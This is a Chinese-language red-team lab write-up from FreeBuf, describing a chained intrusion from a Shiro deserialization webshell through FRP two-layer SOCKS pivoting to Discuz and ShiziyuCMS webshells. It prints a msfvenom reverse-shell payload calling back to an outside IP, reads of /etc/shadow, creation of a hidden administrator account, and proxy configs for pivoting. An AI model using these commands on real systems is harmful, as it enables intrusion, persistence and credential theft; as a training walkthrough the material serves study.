freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

红队攻防渗透——通过二层代理拿下内网服务器
2022-12-22 14:39:51
所属地 山东省

本文涉及到的知识点:

1、信息收集
2、目录爆破
3、shiro反序列化
4、冰蝎和MSF联动
5、内网信息收集
6、FRP一层代理
7、discuz历史漏洞getshell
8、蚁剑配置代理,连接shell
9、FRP二层代理
10、狮子鱼CMS任意文件上传拿shell

1、信息收集

渗透测试的本质就是信息收集,这点我觉得做渗透的师傅们都深有感触,本靶场也是在经过很长时间的信息收集,才找到突破口。

1.1、御剑扫描

image
这里没有扫描出来任何信息,从此之后,我就再也没用过这个工具。

1.2、7kb扫描

image
7kb还行,但是还是没有什么有用的信息。

1.3、端口扫描

image
端口扫描,我们扫描到了22端口,80端口,8086端口,其他两个端口暂且不看。
22端口,我们可以选择利用超级弱口令工具进行爆破。
80端口,我们可以进行网页查看,看看有什么可以操作的空间。
最后我们尝试了22端口,未能成功。

1.4、dirb

这里我们在进行目录扫描的时候,我们极力推荐kali里面dirb,比前面两个工具好用太多了。
image
最后我们将扫描的结果,导入到Ehole3.0-linux工具,可以批量进行指纹识别。
./Ehole3.0-linux -l url.txt
发现目标:http://xxx.x.xx.x:38080/sh/
发现使用了shiro框架,这里我们用Shiro反序列化回显工具。
图片.png
直接写入冰蝎shell,连接。
图片.png
拿到shell,看一下目录结构。
图片.png
是一台linux主机。

2、内网横向

2.1、配合MSF进行信息收集

生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=43.138.57.125 lport=5555 -f exe -o /tmp/wangkun.elf
image
一般这个时候Windows主机,我们就要配合这个网站,进行杀软识别了:https://i.hacking8.com/tiquan/
图片.png
接下来,我们在服务器上做监听。
image
然后冰蝎配置。
图片.png
直接点击给我连,就ok了,这个功能一般没人使用,但是我觉得非常奈斯,但是有的时候,就会有毛病,时好时坏。

拿下shell。
接下来就是三件套,我是谁?我在哪?这是哪?
图片.png
很好root权限。

接下来就是内网的信息收集
ifconfig
图片.png
双网卡
cat /etc/passwd
图片.png
cat /etc/shadow
图片.png
hostname //主机名称
image
whoami //权限
......
这里内网信息收集部分,就不做过多的赘述了。

3、FRP代理

通过frp把内网这台主机代理出来。
在服务器上输入:
./frps -c frps.ini
图片.png
上传frp在受害主机。
图片.png
全部加权限,然后运行。
(root:/li) $ chmod +x frpc (root:/li) $ chmod +x frpc.ini (root:/li) $ chmod +x frpc_full.ini (root:/li) $ chmod +x LICENSE (root:/li) $ ./frpc -c ./frpc.ini
图片.png
SocksCap64测试连接成功。
图片.png
这里又有问题,但是我感觉,这个工具不太好用,个人不太推荐。

3.1、FRP建立一层Socks代理

服务器上的配置:
[common] Bind_port = 4000
image
运行命令:
./frps -c frpc.ini
图片.png
将frp上传至受害主机。
图片.png
给它们加权限。
(root:/li) $ chmod +x frpc (root:/li) $ chmod +x frpc.ini (root:/li) $ chmod +x frpc_full.ini (root:/li) $ chmod +x LICENSE (root:/li) $ ./frpc -c ./frpc.ini
图片.png
因为前期做了信息收集,知道192.168.2.242上面有80端口:discuz(cnvd-2019-22239)
直接火狐配置代理访问。
图片.png
访问成功,看一下页面。
图片.png
在google搜索discuz历史漏洞getshell。
工具如下:https://github.com/theLSA/discuz-ml-rce

因为蚁剑可以配置代理,直接连接shell。
图片.png
添加代理,连接Webshell。
![图片.png](https://image.3001.net/images/20221207/1670380712_638ffca8c802c70c47cd7.png!small
这里因为拿到了system权限,我们接着添加影子账户,把用户加到administrator组。
添加用户:net user mysql$ envl /add
设为管理员组:net localgroup administrators mysql$ /add
图片.png
登陆到服务器。
image
拿到falg。
图片.png
又通过ipconfig发现这台主机有两张网卡。
图片.png

利用fscan内网大杀器,进行信息收集。

fscan.exe -h 192.168.3.0/24 > 111.txt
图片.png
这边在远程主机上找到111.txt文件。
图片.png
发现另一张网卡,网站信息如下。
图片.png
因为这里是别人的内网主机,像信息收集,或者工具利用,都比较麻烦,所以我们通过frp三层代理,把内网主机代理出来,到我们本机进行操作。

3.2、FRP建立二层Socks代理

服务器上配置如下:
[common] bind_port = 7000
命令如下:
./frps -c frps_vps.ini
图片.png

内网shiro主机:192.168.2.151
配置一如下:
[common]
server_addr = 43.138.57.125
server_port =

[socks5_to_2]
type = tcp
remote_port = 10088
plugin = socks5

[socks5_to_3]
type = tcp
local_ip = 127.0.0.1
local_port = 10089
remote_port = 10090

命令如下:
./frpc -c frpc_11.ini

配置二如下:
[common] bind_port = 7000
命令如下:
./frps -c frps_1.ini

内网主机二:192.168.2.190
配置如下:
[common]
server_addr = 192.168.2.151
server_port = 7000

[socks5_2]
type = tcp
plugin = socks5
remote_port = 10089

命令如下:
./frpc -c frpc_2.ini
图片.png
图片.png
在主机开启代理工具。
图片.png
访问一下:192.168.3.180:80端口:
图片.png
成功访问。
通过信息收集,知道它是狮子鱼CMS,上google搜索,发现狮子鱼CMS任意文件上传拿shell
通过抓包。
图片.png
直接上传shell成功
直接访问:
http://192.168.3.180/Common/image/uploads/1656091711618.php
密码为:wkk
图片.png
ifconfig
图片.png
拿到192.168.3.180的flag
图片.png
至此整个渗透结束。

4、结语

本文这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录